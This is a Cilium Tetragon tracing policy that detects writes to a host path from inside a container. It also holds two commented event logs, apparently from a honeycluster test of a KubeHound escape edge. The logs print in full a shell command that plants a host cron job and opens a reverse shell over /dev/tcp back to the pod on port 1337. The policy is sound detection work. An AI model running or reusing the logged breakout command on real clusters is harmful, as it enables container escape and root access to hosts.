apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: detect-exploit-host-write
spec:
  kprobes:
  # - call: "sys_write"  # Capture writes
  #   syscall: true
  #   args:
  #     - index: 0 #file descriptor
  #       type: "int"
  #     - index: 1 # char_buf
  #       type: "char_buf"
  #       sizeArgIndex: 3
  #     - index: 2 # count
  #       type: "int"
  #   selectors:
  #    - matchBinaries:
  #       - operator: "In"
  #         values: 
  #           - "/bin/sh"
  #           - "/bin/bash"
  #      matchNamespaces:
  #       - namespace: "Pid"
  #         operator: "NotIn"
  #         values:
  #           - "host_ns"   
  #      matchArgs:
  #       - index: 0
  #         operator: "Equal"
  #         values:
  #           - "/host/breakout"

  # - call: "sys_fsync"           
  #   syscall: true
  #   args:
  #     - index: 0  # fd
  #       type: "int"
  #   selectors:
  #   - matchBinaries:
  #       - operator: "In"
  #         values: 
  #           - "/bin/sh"
  #           - "/bin/bash"
  #     matchNamespaces:
  #       - namespace: "Pid"
  #         operator: "NotIn"
  #         values:
  #           - "host_ns"


  # - call: "sys_fdatasync"     
  #   syscall: true
  #   args:
  #     - index: 0  # fd
  #       type: "int"
  #   selectors:
  #   - matchBinaries:
  #       - operator: "In"
  #         values: 
  #           - "/bin/sh"
  #           - "/bin/bash"
  #     matchNamespaces: #only if we are not in host_ns
  #       - namespace: "Pid"
  #         operator: "NotIn"
  #         values:
  #           - "host_ns"
  #     matchActions:
  #       - action: "Post"

  - call: "sys_openat" 
    syscall: true
    args:
    - index: 0
      type: "int"   
    - index: 1
      type: "string"   
    - index: 2
      type: "int"    
    selectors:
      - matchArgs:
          - index: 1
            operator: "Equal"
            values:
              - "/host/breakout"
  
#{"process_kprobe":{"process":{"exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMjk5MjUzNjcwNDo1OTI2Ng==", "pid":59266, "uid":0, "cwd":"/", "binary":"/bin/sh", "arguments":"-c \"CONTAINER_ADDRESS=$(ifconfig eth0 | grep inet | cut -d: -f2 | awk '{ print $2}')\necho -n \"* * * * * root /bin/bash -c '/bin/bash -c echo \\\"\\\"; echo \\\"hello from host! \" > /host/etc/cron.d/breakout\necho -n \"$\" >> /host/etc/cron.d/breakout\necho -n \"(hostname) \" >> /host/etc/cron.d/breakout\necho -n \"$\" >> /host/etc/cron.d/breakout\necho \"(id)\\\" >& /dev/tcp/${CONTAINER_ADDRESS}/1337 0>&1'\" >> /host/etc/cron.d/breakout\nnetcat -l -p 1337 2>&1\nsleep infinity\n\"", "flags":"execve rootcwd clone inInitTree", "start_time":"2025-01-11T22:05:10.094665513Z", "auid":4294967295, "pod":{"namespace":"default", "name":"host-write-exploit-pod", "container":{"id":"containerd://c9bc6b5bbf271e0f193394b99c804d9a821b59286532c649b7a7b1e29df9de98", "name":"host-write-exploit-pod", "image":{"id":"docker.io/library/ubuntu@sha256:80dd3c3b9c6cecb9f1667e9290b3bc61b78c2678c02cbdae5f0fea92cc6734ab", "name":"docker.io/library/ubuntu:latest"}, "start_time":"2025-01-11T22:05:10Z", "pid":1}, "pod_labels":{"app":"kubehound-edge-test"}, "workload":"host-write-exploit-pod", "workload_kind":"Pod"}, "docker":"c9bc6b5bbf271e0f193394b99c804d9", "parent_exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMTYxNTk3NTI5ODo1OTE4NQ==", "refcnt":2, "tid":59266, "in_init_tree":true}, "parent":{"exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMTYxNTk3NTI5ODo1OTE4NQ==", "pid":59185, "uid":0, "cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/36960ea65215945e3248d266a9465a6105a0100b365b4164deae5eb546edb58d", "binary":"/usr/local/bin/containerd-shim-runc-v2", "arguments":"-namespace k8s.io -id 36960ea65215945e3248d266a9465a6105a0100b365b4164deae5eb546edb58d -address /run/containerd/containerd.sock", "flags":"execve clone", "start_time":"2025-01-11T22:05:08.718104305Z", "auid":4294967295, "parent_exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMTYxMDA1MjE1Njo1OTE3OA==", "tid":59185, "in_init_tree":false}, "function_name":"__x64_sys_openat", "args":[{"int_arg":-100}, {"string_arg":"/host/etc/cron.d/breakout"}, {"int_arg":577}], "action":"KPROBE_ACTION_POST", "policy_name":"detect-exploit-host-write", "return_action":"KPROBE_ACTION_POST"}, "node_name":"honeycluster-control-plane", "time":"2025-01-11T22:05:10.098589727Z"}
#{"process_kprobe":{"process":{"exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMjk5MjUzNjcwNDo1OTI2Ng==", "pid":59266, "uid":0, "cwd":"/", "binary":"/bin/sh", "arguments":"-c \"CONTAINER_ADDRESS=$(ifconfig eth0 | grep inet | cut -d: -f2 | awk '{ print $2}')\necho -n \"* * * * * root /bin/bash -c '/bin/bash -c echo \\\"\\\"; echo \\\"hello from host! \" > /host/etc/cron.d/breakout\necho -n \"$\" >> /host/etc/cron.d/breakout\necho -n \"(hostname) \" >> /host/etc/cron.d/breakout\necho -n \"$\" >> /host/etc/cron.d/breakout\necho \"(id)\\\" >& /dev/tcp/${CONTAINER_ADDRESS}/1337 0>&1'\" >> /host/etc/cron.d/breakout\nnetcat -l -p 1337 2>&1\nsleep infinity\n\"", "flags":"execve rootcwd clone inInitTree", "start_time":"2025-01-11T22:05:10.094665513Z", "auid":4294967295, "pod":{"namespace":"default", "name":"host-write-exploit-pod", "container":{"id":"containerd://c9bc6b5bbf271e0f193394b99c804d9a821b59286532c649b7a7b1e29df9de98", "name":"host-write-exploit-pod", "image":{"id":"docker.io/library/ubuntu@sha256:80dd3c3b9c6cecb9f1667e9290b3bc61b78c2678c02cbdae5f0fea92cc6734ab", "name":"docker.io/library/ubuntu:latest"}, "start_time":"2025-01-11T22:05:10Z", "pid":1}, "pod_labels":{"app":"kubehound-edge-test"}, "workload":"host-write-exploit-pod", "workload_kind":"Pod"}, "docker":"c9bc6b5bbf271e0f193394b99c804d9", "parent_exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMTYxNTk3NTI5ODo1OTE4NQ==", "refcnt":2, "tid":59266, "in_init_tree":true}, "parent":{"exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMTYxNTk3NTI5ODo1OTE4NQ==", "pid":59185, "uid":0, "cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/36960ea65215945e3248d266a9465a6105a0100b365b4164deae5eb546edb58d", "binary":"/usr/local/bin/containerd-shim-runc-v2", "arguments":"-namespace k8s.io -id 36960ea65215945e3248d266a9465a6105a0100b365b4164deae5eb546edb58d -address /run/containerd/containerd.sock", "flags":"execve clone", "start_time":"2025-01-11T22:05:08.718104305Z", "auid":4294967295, "parent_exec_id":"aG9uZXljbHVzdGVyLWNvbnRyb2wtcGxhbmU6MzgwMTYxMDA1MjE1Njo1OTE3OA==", "tid":59185, "in_init_tree":false}, "function_name":"__x64_sys_openat", "args":[{"int_arg":-100}, {"string_arg":"/host/etc/cron.d/breakout"}, {"int_arg":1089}], "action":"KPROBE_ACTION_POST", "policy_name":"detect-exploit-host-write", "return_action":"KPROBE_ACTION_POST"}, "node_name":"honeycluster-control-plane", "time":"2025-01-11T22:05:10.098715039Z"}
